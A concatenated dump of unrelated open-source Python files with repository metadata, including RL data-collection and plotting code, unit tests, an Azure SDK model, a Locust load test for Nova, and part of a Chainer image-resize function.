        decision[index[0:normal_test_data.shape[0]]]=0
        decision[index[normal_test_data.shape[0]:]]=1
        # save decision results
        save_csv(save_file_path=decision_result_csv, save_data=decision_result_list)
        com.logger.info("decision result -> {}".format(decision_result_csv))
        print("\n============ END OF TEST ============")
        # caculate statistical results
        auc = metrics.roc_auc_score(y_true, y_pred)
        print('auc:',auc)
        auc_total[itr]=auc
        tn, fp, fn, tp = metrics.confusion_matrix(y_true, decision).ravel()
        # epsilon guards the divisions against empty classes
        prec = tp / np.maximum(tp + fp, sys.float_info.epsilon)
        recall = tp / np.maximum(tp + fn, sys.float_info.epsilon)
        f1 = 2.0 * prec * recall / np.maximum(prec + recall, sys.float_info.epsilon)
        print('prec:',prec)
        print('recall:',recall)
        print('f1:',f1)
        prec_total[itr] = prec
        recall_total[itr] = recall
        f1_total[itr] = f1
        # per-class accuracies rely on the concatenation order:
        # [normal, bruise, decay, contaminated]
        acc_normal = 1 - np.sum(decision[0:y_true_normal.shape[0]]) / y_true_normal.shape[0]
        acc_bruise = np.sum(decision[y_true_normal.shape[0]:y_true_normal.shape[0] + abnormal_size1]) / abnormal_size1
        acc_decay = np.sum(decision[y_true_normal.shape[0] + abnormal_size1:y_true_normal.shape[0] + abnormal_size1 + abnormal_size2]) / abnormal_size2
        acc_contaminated = np.sum(decision[y_true_normal.shape[0] + abnormal_size1 + abnormal_size2:]) / abnormal_size3
        acc_normal_total[itr] = acc_normal
        acc_bruise_total[itr] = acc_bruise
        acc_decay_total[itr] = acc_decay
        acc_contaminated_total[itr] = acc_contaminated
        csv_lines.append(['strawberry_'+str(itr)+'runs', auc, f1, acc_normal, acc_bruise, acc_decay, acc_contaminated])
  # statistical results for 10 runs
  auc_mean = np.mean(auc_total)
  prec_mean = np.mean(prec_total)
  recall_mean = np.mean(recall_total)
  f1_mean = np.mean(f1_total)
  acc_normal_mean = np.mean(acc_normal_total)
  acc_bruise_mean = np.mean(acc_bruise_total)
  acc_decay_mean = np.mean(acc_decay_total)
  acc_contaminated_mean = np.mean(acc_contaminated_total)
  auc_std = np.std(auc_total)
  f1_std = np.std(f1_total)
  acc_normal_std = np.std(acc_normal_total)
  acc_bruise_std = np.std(acc_bruise_total)
  acc_decay_std = np.std(acc_decay_total)
  acc_contaminated_std = np.std(acc_contaminated_total)
  print('auc',auc_total)
  print('f1',f1_total)
  print('acc_normal',acc_normal_total)
  print('acc_bruise',acc_bruise_total)
  print('acc_decay',acc_decay_total)
  print('acc_contaminated',acc_contaminated_total)
  csv_lines.append(['strawberry_10runs_mean', auc_mean, f1_mean, acc_normal_mean, acc_bruise_mean, acc_decay_mean,acc_contaminated_mean])
  csv_lines.append(['strawberry_10runs_std', auc_std, f1_std, acc_normal_std, acc_bruise_std, acc_decay_std, acc_contaminated_std])
  # save results
  result_path = "{result}/{file_name}".format(result=param["result_directory"], file_name='result.csv')
  com.logger.info("statistical results -> {}".format(result_path))
  save_csv(save_file_path=result_path, save_data=csv_lines)
795baaca02700ea82e4b707300430dde6667d60e | 14,710 | py | Python | reset_free_learning/test_script.py | shaun95/google-research | d41bbaca1eb9bfd980ec2b3fd201c3ddb4d1f2e5 | [
"Apache-2.0"
] | 1 | 2022-03-13T21:48:52.000Z | 2022-03-13T21:48:52.000Z | reset_free_learning/test_script.py | shaun95/google-research | d41bbaca1eb9bfd980ec2b3fd201c3ddb4d1f2e5 | [
"Apache-2.0"
] | null | null | null | reset_free_learning/test_script.py | shaun95/google-research | d41bbaca1eb9bfd980ec2b3fd201c3ddb4d1f2e5 | [
"Apache-2.0"
] | 1 | 2022-03-30T07:20:29.000Z | 2022-03-30T07:20:29.000Z | # coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test script."""
import os
import time
from gym.wrappers.monitor import Monitor # pylint: disable=unused-import
import numpy as np
import tensorflow as tf
from tf_agents.environments import tf_py_environment
from tf_agents.environments.suite_gym import wrap_env
from tf_agents.policies import random_tf_policy
from tf_agents.replay_buffers import tf_uniform_replay_buffer
from tf_agents.trajectories import trajectory
from tf_agents.utils import common, nest_utils # pylint: disable=g-multiple-import
from reset_free_learning.envs import kitchen
from reset_free_learning.envs import playpen
from reset_free_learning.envs import playpen_reduced
from reset_free_learning.envs import point_mass
from reset_free_learning.envs import point_mass_full_goal
from reset_free_learning.envs import pusher2d_simple
from reset_free_learning.envs import sawyer_door_close
from reset_free_learning.envs import sawyer_object
from reset_free_learning.reset_free_wrapper import GoalTerminalResetFreeWrapper # pylint: disable=unused-import
from reset_free_learning.reset_free_wrapper import GoalTerminalResetWrapper
from reset_free_learning.reset_free_wrapper import ResetFreeWrapper # pylint: disable=unused-import
def print_initial_state(step):
  """Print the first half of a time step's observation as a bracketed list.

  Assumes the observation concatenates state and goal, with 74 // 2 = 37
  state dimensions -- TODO confirm against the environments used here.
  """
  obs_strings = [str(step.observation[idx]) for idx in range(74 // 2)]
  # fix: the original called the non-existent str.joing, which raised
  # AttributeError on every invocation
  obs_to_string = '[' + ','.join(obs_strings) + ']'
  print(obs_to_string)
def get_env(name='sawyer_object', **env_kwargs):
  """Construct one of the benchmark environments by name.

  `env_kwargs` are forwarded only to the point-mass and playpen variants;
  the other environments take fixed constructor arguments. An unknown name
  leaves `env` unbound and raises at the return, as before.
  """
  if name == 'sawyer_object':
    env = sawyer_object.SawyerObject(  # pylint: disable=redefined-outer-name
        random_init=True,
        task_type='push',
        obs_type='with_goal',
        goal_low=(-0.1, 0.8, 0.05),
        goal_high=(0.1, 0.9, 0.3),
        liftThresh=0.04,
        sampleMode='equal',
        rewMode='orig',
        rotMode='fixed')
    env.set_camera_view(view='topview')
    env.set_max_path_length(int(1e8))
  elif name == 'pusher2d_simple':
    env = pusher2d_simple.PusherEnv()
  elif name == 'point_mass':
    env = point_mass.PointMassEnv(**env_kwargs)
  elif name == 'point_mass_full_goal':
    env = point_mass_full_goal.PointMassEnv(**env_kwargs)
  elif name == 'sawyer_door':
    env = sawyer_door_close.SawyerDoor(random_init=True, obs_type='with_goal')
    env.set_camera_view(view='topview')
    env.set_max_path_length(int(1e8))
  elif name == 'kitchen':
    env = kitchen.Kitchen()
  elif name == 'playpen':
    env = playpen.ContinuousPlayPen(**env_kwargs)
  elif name == 'playpen_reduced':
    env = playpen_reduced.ContinuousPlayPen(**env_kwargs)
  return env
def copy_replay_buffer(small_buffer, big_buffer):
  """Append every transition stored in ``small_buffer`` to ``big_buffer``."""
  # gather_all() returns batched tensors; strip the batch dimension, then
  # split into per-transition structures matching the target's data spec.
  batched = small_buffer.gather_all()
  unbatched = nest_utils.unbatch_nested_tensors(batched)
  for item in nest_utils.unstack_nested_tensors(unbatched,
                                                big_buffer.data_spec):
    big_buffer.add_batch(item)
def data_multiplier(offline_data, reward_fn):  # pylint: disable=redefined-outer-name
  """Offline data multiplication.

  Unpacks every trajectory stored in ``offline_data`` and, at a fixed set of
  indices, relabels the preceding episode with that step's achieved state as
  the goal (hindsight-style relabeling), appending the relabeled transitions
  back into the same buffer.  ``reward_fn`` recomputes the sparse reward for
  each relabeled observation.
  """
  np.set_printoptions(precision=2, suppress=True)

  # Debug helper: dump every field of a single trajectory struct.
  def _custom_print(some_traj):  # pylint: disable=unused-variable
    np.set_printoptions(precision=2, suppress=True)
    print('step', some_traj.step_type.numpy(), 'obs',
          some_traj.observation.numpy(), 'action', some_traj.action.numpy(),
          'reward', some_traj.reward.numpy(), 'next_step',
          some_traj.next_step_type.numpy(), 'discount',
          some_traj.discount.numpy())

  all_data = nest_utils.unbatch_nested_tensors(offline_data.gather_all())
  all_trajs = nest_utils.unstack_nested_tensors(all_data,
                                                offline_data.data_spec)
  for idx, traj in enumerate(all_trajs):
    print('index:', idx)
    if traj.step_type.numpy() == 0:
      # step_type 0 marks an episode start; remember where it began.
      ep_start_idx = idx
      print('\n\n\nnew start index:', ep_start_idx)
    elif idx in [12, 24, 36, 48, 60, 72, 84, 96, 108]:
      # Hard-coded relabel points — presumably every 12th step of the
      # hand-collected trajectories; TODO confirm against the collection run.
      print('adding new trajectory')
      # Observation is [state, goal]; use the achieved state as the new goal.
      obs_dim = traj.observation.shape[0] // 2
      relabel_goal = traj.observation[:obs_dim]
      print('new goal:', repr(relabel_goal.numpy()))
      last_traj_idx = len(all_trajs[ep_start_idx:idx + 1])
      for traj_idx, cur_trajectory in enumerate(all_trajs[ep_start_idx:idx +
                                                          1]):
        if cur_trajectory.step_type.numpy() != 2:
          new_obs = tf.concat(
              [cur_trajectory.observation[:obs_dim], relabel_goal], axis=0)
          next_obs = tf.concat([
              all_trajs[ep_start_idx + traj_idx + 1].observation[:obs_dim],
              relabel_goal
          ],
                               axis=0)
          new_reward = tf.constant(reward_fn(obs=next_obs))
          # terminate episode
          if new_reward.numpy() > 0.0:
            # Goal reached under the relabeled goal: emit a terminal
            # transition (next_step_type=2, discount=0) and stop early.
            new_traj = cur_trajectory._replace(
                observation=new_obs,
                next_step_type=tf.constant(2),
                reward=new_reward,
                discount=tf.constant(0., dtype=tf.float32))
            last_traj_idx = ep_start_idx + traj_idx + 1
            # _custom_print(new_traj)
            offline_data.add_batch(new_traj)
            break
          else:
            new_traj = cur_trajectory._replace(
                observation=new_obs,
                reward=new_reward,
            )
            # _custom_print(new_traj)
            offline_data.add_batch(new_traj)
      # Close the relabeled episode with an explicit boundary transition.
      last_observation = tf.concat(
          [all_trajs[last_traj_idx].observation[:obs_dim], relabel_goal],
          axis=0)
      last_traj = cur_trajectory._replace(  # pylint: disable=undefined-loop-variable
          step_type=tf.constant(2),
          observation=last_observation,
          next_step_type=tf.constant(0),
          reward=tf.constant(0.0),
          discount=tf.constant(1., dtype=tf.float32))
      # _custom_print(last_traj)
      offline_data.add_batch(last_traj)
  print('new size:', offline_data.num_frames())
if __name__ == '__main__':
  # Interactive data-collection loop: a human drives the playpen environment
  # with keyboard commands; transitions are accumulated in a TF-Agents replay
  # buffer and checkpointed on demand.
  max_episode_steps = 5000000
  # env = get_env(name='point_mass_full_goal', env_type='y', reward_type='sparse')
  # env = get_env(name='kitchen')
  env = get_env(name='playpen_reduced', task_list='rc_o', reward_type='sparse')
  base_dir = os.path.abspath('experiments/env_logs/playpen_reduced/symmetric/')
  env_log_dir = os.path.join(base_dir, 'rc_o/traj1/')
  # env = ResetFreeWrapper(env, reset_goal_frequency=500, full_reset_frequency=max_episode_steps)
  env = GoalTerminalResetWrapper(
      env,
      episodes_before_full_reset=max_episode_steps // 500,
      goal_reset_frequency=500)
  # env = Monitor(env, env_log_dir, video_callable=lambda x: x % 1 == 0, force=True)
  env = wrap_env(env)
  tf_env = tf_py_environment.TFPyEnvironment(env)
  tf_env.render = env.render
  time_step_spec = tf_env.time_step_spec()
  action_spec = tf_env.action_spec()
  # The random policy is only used to produce correctly-typed action steps;
  # the actual actions below come from keyboard input.
  policy = random_tf_policy.RandomTFPolicy(
      action_spec=action_spec, time_step_spec=time_step_spec)
  collect_data_spec = trajectory.Trajectory(
      step_type=time_step_spec.step_type,
      observation=time_step_spec.observation,
      action=action_spec,
      policy_info=policy.info_spec,
      next_step_type=time_step_spec.step_type,
      reward=time_step_spec.reward,
      discount=time_step_spec.discount)
  offline_data = tf_uniform_replay_buffer.TFUniformReplayBuffer(
      data_spec=collect_data_spec, batch_size=1, max_length=int(1e5))
  rb_checkpointer = common.Checkpointer(
      ckpt_dir=os.path.join(env_log_dir, 'replay_buffer'),
      max_to_keep=10_000,
      replay_buffer=offline_data)
  rb_checkpointer.initialize_or_restore()
  # replay buffer copy magic
  # One-off merge of previously collected buffers into this one; disabled by
  # default.
  do_a_copy = False
  if do_a_copy:
    buffer_list = [
        os.path.join(base_dir, 'rc_o/combined/replay_buffer'),
        os.path.join(base_dir, 'rc_k/combined/replay_buffer'),
        os.path.join(base_dir, 'rc_p/combined/replay_buffer'),
        os.path.join(base_dir, 'rc_b/combined/replay_buffer'),
    ]
    for buffer_dir in buffer_list:
      loaded_buffer = tf_uniform_replay_buffer.TFUniformReplayBuffer(
          data_spec=collect_data_spec, batch_size=1, max_length=int(1e5))
      cur_checkpointer = common.Checkpointer(
          ckpt_dir=buffer_dir, max_to_keep=10_000, replay_buffer=loaded_buffer)
      print(loaded_buffer.num_frames())
      copy_replay_buffer(loaded_buffer, offline_data)
    # NOTE(review): indentation reconstructed — presumed to save once after
    # the merge loop; confirm against the original file.
    rb_checkpointer.save(global_step=0)
  start_time = time.time()
  # env.do_custom_reset(pos=np.array([0, 8, 1.57]))
  time_step = tf_env.reset()
  # print_initial_state(time_step)
  # print(time_step.observation)
  step_size = 0.5
  # First keyboard character selects planar motion (wasd, 'x' = stay put).
  command_to_action_map = {
      'd': [step_size, 0],
      'a': [-step_size, 0],
      'w': [0, step_size],
      's': [0, -step_size],
      'x': [0, 0]
  }
  # Optional second character: 'p' and 'l' set the third action channel.
  pick_drop_map = {'p': [1], 'l': [-1]}
  print(offline_data.num_frames())
  # data_multiplier(offline_data, tf_env.pyenv.envs[0].env.compute_reward)
  # print(offline_data.num_frames())
  # print(offline_data.gather_all())
  # exit()
  rb_checkpoint_idx = 0
  for i in range(1, 2000):
    tf_env.render(mode='human')
    print(time_step)
    action_step = policy.action(time_step)
    # get action from user
    command = input('action:')
    if len(command) > 1:
      action = np.concatenate(
          [command_to_action_map[command[0]], pick_drop_map[command[1]]])
    else:
      # No pick/drop key given: the third channel defaults to 1.
      action = np.concatenate([command_to_action_map[command[0]], [1]])
    # add noise to action
    action[:2] += np.random.uniform(low=-0.1, high=0.1, size=2)
    action_step = action_step._replace(
        action=tf.constant([action], dtype=tf.float32))
    next_time_step = tf_env.step(action_step.action)
    print('reward:', next_time_step.reward)
    offline_data.add_batch(
        trajectory.from_transition(time_step, action_step, next_time_step))
    if next_time_step.is_last():
      # print(i, env.get_info())
      # Episode boundary: record the boundary transition, then offer to
      # checkpoint ('y') or clear ('c') the buffer before continuing.
      time_step = next_time_step
      print('last step:', time_step)
      next_time_step = tf_env.step(action_step.action)  # dummy action for reset
      offline_data.add_batch(
          trajectory.from_transition(time_step, action_step, next_time_step))
      command = input('save offline data?')
      if command == 'y':
        print('saving data')
        rb_checkpointer.save(global_step=rb_checkpoint_idx)
        rb_checkpoint_idx += 1
      elif command == 'c':
        print('clearing data')
        offline_data.clear()
      else:
        print('not saving data')
    time_step = next_time_step
  print('time:', time.time() - start_time)
# dummy stuff to store plotting code
else:
import tensorflow as tf # tf # pylint: disable=g-import-not-at-top
import matplotlib # pylint: disable=g-import-not-at-top, unused-import
import matplotlib.pyplot as plt # pylint: disable=g-import-not-at-top
import matplotlib.cm as cm # pylint: disable=g-import-not-at-top, unused-import
import numpy as np # pylint: disable=g-import-not-at-top, reimported
import seaborn as sns # pylint: disable=g-import-not-at-top, unused-import
import re # pylint: disable=g-import-not-at-top, unused-import
import pickle as pkl # pylint: disable=g-import-not-at-top, unused-import
import os # pylint: disable=g-import-not-at-top, reimported
max_index = int(1e7)
def smooth(x, alpha):
  """Exponentially smooth ``x`` in place and return the same object.

  Each element becomes ``(1 - alpha) * x[k] + alpha * x[k - 1]`` using the
  already-smoothed previous value, so higher ``alpha`` means heavier
  smoothing.  Accepts either a Python list or an array-like with ``shape``.
  """
  n = len(x) if isinstance(x, list) else x.shape[0]
  for k in range(1, n):
    x[k] = (1 - alpha) * x[k] + alpha * x[k - 1]
  return x
def make_graph_with_variance(vals, x_interval):
  """Aggregate several runs into a mean/std curve for plotting.

  Args:
    vals: list of per-run y-value sequences (mutated in place by ``smooth``).
    x_interval: per-run eval intervals; x-coords are ``interval * step_idx``.

  Returns:
    (index, means, stds): sorted x-coords, smoothed means and smoothed stds
    aggregated across runs at each shared x-coord.
  """
  data_x = []
  data_y = []
  # ``global`` is unnecessary here (max_index is only read) — harmless.
  global max_index
  for y_coords, eval_interval in zip(vals, x_interval):
    # NOTE: smooth() mutates y_coords in place.
    data_y.append(smooth(y_coords, 0.95))
    x_coords = [eval_interval * idx for idx in range(len(y_coords))]
    data_x.append(x_coords)
  plot_dict = {}
  cur_max_index = max_index
  # for cur_x, cur_y in zip(data_x, data_y):
  #   cur_max_index = min(cur_max_index, cur_x[-1])
  # print(cur_max_index)
  # Bucket y-values by x-coordinate, discarding points beyond the cutoff.
  for cur_x, cur_y in zip(data_x, data_y):
    for x, y in zip(cur_x, cur_y):
      if x <= cur_max_index:
        if x in plot_dict.keys():
          plot_dict[x].append(y)
        else:
          plot_dict[x] = [y]
  index, means, stds = [], [], []
  for key in sorted(plot_dict.keys()):  # pylint: disable=g-builtin-op
    index.append(key)
    means.append(np.mean(plot_dict[key]))
    stds.append(np.std(plot_dict[key]))
  # A second smoothing pass over the aggregated curves.
  means = np.array(smooth(means, 0.9))
  stds = np.array(smooth(stds, 0.8))
  return index, means, stds
def np_custom_load(fname):
  """Load a ``.npy`` file from ``fname`` (via tf.gfile) as float32."""
  with tf.gfile.Open(fname, 'rb') as f:
    return np.load(f).astype(np.float32)
# Matplotlib color cycle and the derived color+linestyle combinations,
# grouped by linestyle ('b-', 'g-', ..., then 'b--', 'g--', ...).
color_map = ['b', 'g', 'r', 'c', 'm', 'y', 'k']
style_map = [color + line_style
             for line_style in ['-', '--', '-.', ':']
             for color in color_map]
def plot_call(job_id,
              worker_ids,
              legend_label,
              plot_style,
              file_path,
              y_plot='return'):
  """Outermost function for plotting graphs with variance.

  Loads per-worker eval curves, aggregates them via
  make_graph_with_variance, and draws a mean line with a shaded std band.

  Args:
    job_id: job identifier (stringified before path construction).
    worker_ids: iterable of worker sub-directory names.
    legend_label: label for the plotted line.
    plot_style: matplotlib style string, e.g. 'b-'; first char is the color.
    file_path: base directory for the y-value .npy files.
    y_plot: 'return' or 'success'.  NOTE(review): any other value leaves
      y_coords undefined and raises NameError.
  """
  print(worker_ids)
  job_id = str(job_id)
  if y_plot == 'return':
    y_coords = [
        np_custom_load(file_path +  # pylint: disable=g-complex-comprehension
                       job_id + '/' + worker_id +
                       '/eval/average_eval_return.npy')
        for worker_id in worker_ids
    ]
  elif y_plot == 'success':
    y_coords = [
        np_custom_load(file_path +  # pylint: disable=g-complex-comprehension
                       job_id + '/' + worker_id +
                       '/eval/average_eval_success.npy')
        for worker_id in worker_ids
    ]
  # NOTE(review): eval_interval is read from a hard-coded home directory,
  # not from `file_path` like the curves above — looks like a leftover;
  # confirm whether it should use file_path.
  eval_interval = [
      np_custom_load('/home/architsh/brain/reset_free/reset_free/' + job_id +
                     '/' + worker_id + '/eval/eval_interval.npy')
      for worker_id in worker_ids
  ]
  index, means, stds = make_graph_with_variance(y_coords, eval_interval)
  plt.plot(index, means, plot_style, label=legend_label)
  cur_color = plot_style[0]
  plt.fill_between(
      index, means - stds, means + stds, color=cur_color, alpha=0.2)
| 37.052897 | 112 | 0.67172 |
795bacfa292b1dee9719810769b1e01c205fd2c3 | 1,456 | py | Python | tests/test_user.py | rukaury/ePlannerAPI | 8f9dad6f6716670d23ec8087ad07504a39f7564d | [
"MIT"
] | null | null | null | tests/test_user.py | rukaury/ePlannerAPI | 8f9dad6f6716670d23ec8087ad07504a39f7564d | [
"MIT"
] | null | null | null | tests/test_user.py | rukaury/ePlannerAPI | 8f9dad6f6716670d23ec8087ad07504a39f7564d | [
"MIT"
] | null | null | null | from app import db
from tests.base import BaseTestCase
from app.models.users import User
import unittest
class TestUserModel(BaseTestCase):
    """
    Test that the auth token is generated correctly
    """

    def test_encode_user_token(self):
        """
        Test that a user token is generated correctly
        :return:
        """
        user = self.create_and_save_user()
        auth_token = self.get_auth_token(user)
        # assertIsInstance gives a clearer failure message than
        # assertTrue(isinstance(...)).
        self.assertIsInstance(auth_token, bytes)

    def test_decode_user_token(self):
        """
        Test that the user auth token is decoded and that its valid
        :return:
        """
        user = self.create_and_save_user()
        auth_token = self.get_auth_token(user)
        self.assertIsInstance(auth_token, bytes)
        # assertEqual reports expected vs. actual on failure, unlike
        # assertTrue(x == 1).
        self.assertEqual(
            user.decode_auth_token(auth_token.decode('utf-8')), 1,
            msg='The user Id should be 1')

    def create_and_save_user(self):
        """
        Helper method to create and save a user in the database
        :return:
        """
        user = User(email='example@gmail.com', password='123456')
        db.session.add(user)
        db.session.commit()
        return user

    def get_auth_token(self, user):
        """
        Helper method to encode a user auth token
        :param user:
        :return:
        """
        return user.encode_auth_token(user.id)
if __name__ == '__main__':
    # Allow running this test module directly: python tests/test_user.py
    unittest.main()
| 27.471698 | 111 | 0.62294 |
795badd2ff1e68eea64f9f3e142efb3bc38f5f94 | 1,830 | py | Python | azure-mgmt-network/azure/mgmt/network/v2018_12_01/models/application_gateway_ssl_predefined_policy.py | JonathanGailliez/azure-sdk-for-python | f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b | [
"MIT"
] | 1 | 2021-09-07T18:36:04.000Z | 2021-09-07T18:36:04.000Z | azure-mgmt-network/azure/mgmt/network/v2018_12_01/models/application_gateway_ssl_predefined_policy.py | JonathanGailliez/azure-sdk-for-python | f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b | [
"MIT"
] | 2 | 2019-10-02T23:37:38.000Z | 2020-10-02T01:17:31.000Z | azure-mgmt-network/azure/mgmt/network/v2018_12_01/models/application_gateway_ssl_predefined_policy.py | JonathanGailliez/azure-sdk-for-python | f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b | [
"MIT"
] | null | null | null | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .sub_resource import SubResource
class ApplicationGatewaySslPredefinedPolicy(SubResource):
"""An Ssl predefined policy.
:param id: Resource ID.
:type id: str
:param name: Name of the Ssl predefined policy.
:type name: str
:param cipher_suites: Ssl cipher suites to be enabled in the specified
order for application gateway.
:type cipher_suites: list[str or
~azure.mgmt.network.v2018_12_01.models.ApplicationGatewaySslCipherSuite]
:param min_protocol_version: Minimum version of Ssl protocol to be
supported on application gateway. Possible values include: 'TLSv1_0',
'TLSv1_1', 'TLSv1_2'
:type min_protocol_version: str or
~azure.mgmt.network.v2018_12_01.models.ApplicationGatewaySslProtocol
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'cipher_suites': {'key': 'properties.cipherSuites', 'type': '[str]'},
'min_protocol_version': {'key': 'properties.minProtocolVersion', 'type': 'str'},
}
def __init__(self, **kwargs):
super(ApplicationGatewaySslPredefinedPolicy, self).__init__(**kwargs)
self.name = kwargs.get('name', None)
self.cipher_suites = kwargs.get('cipher_suites', None)
self.min_protocol_version = kwargs.get('min_protocol_version', None)
| 40.666667 | 88 | 0.642077 |
795bae0052082720624a682405ae7a4f25513b75 | 2,195 | py | Python | rannsaka/locust_files/task_sets/basic_get.py | pcrews/rannsaka | 4bd86e86eb31c18e9ec0cbbc7926f8f3d4063e26 | [
"Apache-2.0"
] | 2 | 2015-11-11T16:14:17.000Z | 2019-01-13T05:02:51.000Z | rannsaka/locust_files/task_sets/basic_get.py | pcrews/rannsaka | 4bd86e86eb31c18e9ec0cbbc7926f8f3d4063e26 | [
"Apache-2.0"
] | null | null | null | rannsaka/locust_files/task_sets/basic_get.py | pcrews/rannsaka | 4bd86e86eb31c18e9ec0cbbc7926f8f3d4063e26 | [
"Apache-2.0"
] | null | null | null | if __name__ == "__main__" and __package__ is None:
__package__ = "task_sets.nova_basic_task_set"
import os
import random
import time
import json
from locust import HttpLocust, TaskSet, task
from baseTaskSet import baseTaskSet
import task_funcs.keystone_v2_base as keystone_base
import task_funcs.nova_v2_base as nova_base
import task_funcs.nova_v2_utility as nova_util
class basicGet(baseTaskSet):
""" task set designed to do insane, random, and valid things
via the nova api
"""
def on_start(self):
super(basicGet, self).on_start()
self.server_count = 0
# Use admin pw to create test flavors
self.keystone_user = self.get_tempest_config_value('identity', 'admin_username')
self.keystone_pw = self.get_tempest_config_value('identity', 'admin_password')
self.keystone_tenant = self.get_tempest_config_value('identity', 'admin_tenant_name')
self.auth_token, self.tenant_id, self.service_catalog = keystone_base.get_auth_token(self)
nova_base.create_flavor(self, name='test1',
ram=4096,
vcpus=2,
disk=0,
id=9999,
is_public=True)
nova_base.create_flavor(self, name='test2',
ram=2048,
vcpus=2,
disk=0,
id=9998,
is_public=True)
# reset to 'main' test user
self.keystone_user = self.get_tempest_config_value('identity','username')
self.keystone_tenant = self.get_tempest_config_value('identity','tenant_name')
self.keystone_pw = self.get_tempest_config_value('identity','password')
self.auth_token, self.tenant_id, self.service_catalog = keystone_base.get_auth_token(self)
tasks = { nova_base.list_servers: 1,
nova_base.list_servers_detail: 1,
nova_base.list_flavors: 1,
nova_base.list_images: 1,
nova_base.list_images_detail: 1,
nova_base.list_image_detail: 1,
nova_base.list_image_metadata: 1,
nova_base.list_limits: 1
}
| 37.20339 | 98 | 0.634624 |
795bae458b30b6afef21de4895095801b46687e3 | 544 | py | Python | manage.py | Miguelrom/EasyApproval | 14bc48086ca20a2830d0ff17961a7cec84ea42bc | [
"Apache-2.0"
] | null | null | null | manage.py | Miguelrom/EasyApproval | 14bc48086ca20a2830d0ff17961a7cec84ea42bc | [
"Apache-2.0"
] | 3 | 2019-12-03T22:36:30.000Z | 2019-12-12T01:27:34.000Z | manage.py | Miguelrom/EasyApproval | 14bc48086ca20a2830d0ff17961a7cec84ea42bc | [
"Apache-2.0"
] | 12 | 2019-12-03T22:36:12.000Z | 2019-12-12T05:52:15.000Z | #!/usr/bin/env python
import os
import sys
if __name__ == '__main__':
    # Standard Django management entry point (manage.py).
    os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'EasyApproval.settings')
    try:
        from django.core.management import execute_from_command_line
    except ImportError as exc:
        # Re-raise with a hint about the most common causes.
        raise ImportError(
            "Couldn't import Django. Are you sure it's installed and "
            "available on your PYTHONPATH environment variable? Did you "
            "forget to activate a virtual environment?"
        ) from exc
    execute_from_command_line(sys.argv)
| 34 | 76 | 0.689338 |
795baf163b123836e69f2e9a67e51f256adfd230 | 184 | py | Python | counterblock/__init__.py | coinwarp/dogeblock | fc4a3a8315e1e822c1261f0fbcb4e1bbd300dfcd | [
"MIT"
] | null | null | null | counterblock/__init__.py | coinwarp/dogeblock | fc4a3a8315e1e822c1261f0fbcb4e1bbd300dfcd | [
"MIT"
] | null | null | null | counterblock/__init__.py | coinwarp/dogeblock | fc4a3a8315e1e822c1261f0fbcb4e1bbd300dfcd | [
"MIT"
] | null | null | null | import os, sys
def server_main():
    """Console-script entry point that starts the counterblock server."""
    # Imported lazily so the package can be imported without side effects.
    from counterblock import server as srv
    srv.main()
def armory_utxsvr_main():
    """Console-script entry point that starts the armory unsigned-tx server."""
    # Imported lazily so the package can be imported without side effects.
    from counterblock import armory_utxsvr as svc
    svc.main()
| 18.4 | 42 | 0.73913 |
795baf6a1f4e38cd98c20021e0b6d3b3b1a7b6f8 | 9,500 | py | Python | chainer/functions/array/resize_images.py | chemshi/chainer | ff322e0a87b0a9e3dc3d49f62ce2f3cb6dc19cc9 | [
"MIT"
] | 1 | 2019-04-09T04:55:06.000Z | 2019-04-09T04:55:06.000Z | chainer/functions/array/resize_images.py | chemshi/chainer | ff322e0a87b0a9e3dc3d49f62ce2f3cb6dc19cc9 | [
"MIT"
] | null | null | null | chainer/functions/array/resize_images.py | chemshi/chainer | ff322e0a87b0a9e3dc3d49f62ce2f3cb6dc19cc9 | [
"MIT"
] | null | null | null | import numpy
from chainer import backend
from chainer.backends import cuda
from chainer import function_node
from chainer.utils import type_check
def _infer_lines(B, C, H, W, out_H, out_W, kH, kW):
target_size = 2 ** 17
line_size = B * C * (H * W // out_H + kH * kW * out_W)
target_lines = target_size // line_size
if target_lines < out_H:
lines = 1
while True:
next_lines = lines * 2
if next_lines > target_lines:
break
lines = next_lines
else:
lines = out_H
return lines
def interpolate_bilinear_cpu(x, v, u, vw, uw):
    """Bilinear interpolation on CPU.

    Args:
        x: input images, shape (B, C, H, W).
        v, u: integer source row/column indices, shape (out_H, out_W).
        vw, uw: fractional row/column weights, shape (out_H, out_W).

    Returns:
        Resized images of shape (B, C, out_H, out_W).
    """
    B, C, H, W = x.shape
    out_H, out_W = v.shape
    # Interpolation is done by each output panel (i.e. multi lines)
    # in order to better utilize CPU cache memory.
    lines = _infer_lines(B, C, H, W, out_H, out_W, 2, 2)
    # Scratch buffers for indices/weights, allocated once and re-sliced
    # per panel below.
    vcol = numpy.empty((2, lines, out_W), dtype=v.dtype)
    ucol = numpy.empty((2, lines, out_W), dtype=u.dtype)
    wcol = numpy.empty((2, 2, lines, out_W), dtype=x.dtype)
    y = numpy.empty((B * C, out_H * out_W), dtype=x.dtype)
    for i in range(0, out_H, lines):
        # The final panel may be shorter than ``lines``.
        l = min(lines, out_H - i)
        vcol = vcol[:, :l]
        ucol = ucol[:, :l]
        wcol = wcol[:, :, :l]
        i_end = i + l
        # indices: row/col of the top-left source pixel and its neighbor,
        # clamped to the image border.
        vcol[0] = v[i:i_end]
        ucol[0] = u[i:i_end]
        numpy.add(vcol[0], 1, out=vcol[1])
        numpy.add(ucol[0], 1, out=ucol[1])
        numpy.minimum(vcol[1], H - 1, out=vcol[1])
        numpy.minimum(ucol[1], W - 1, out=ucol[1])
        # weights
        # wcol[0, 0] = (1 - uw) * (1 - vw)
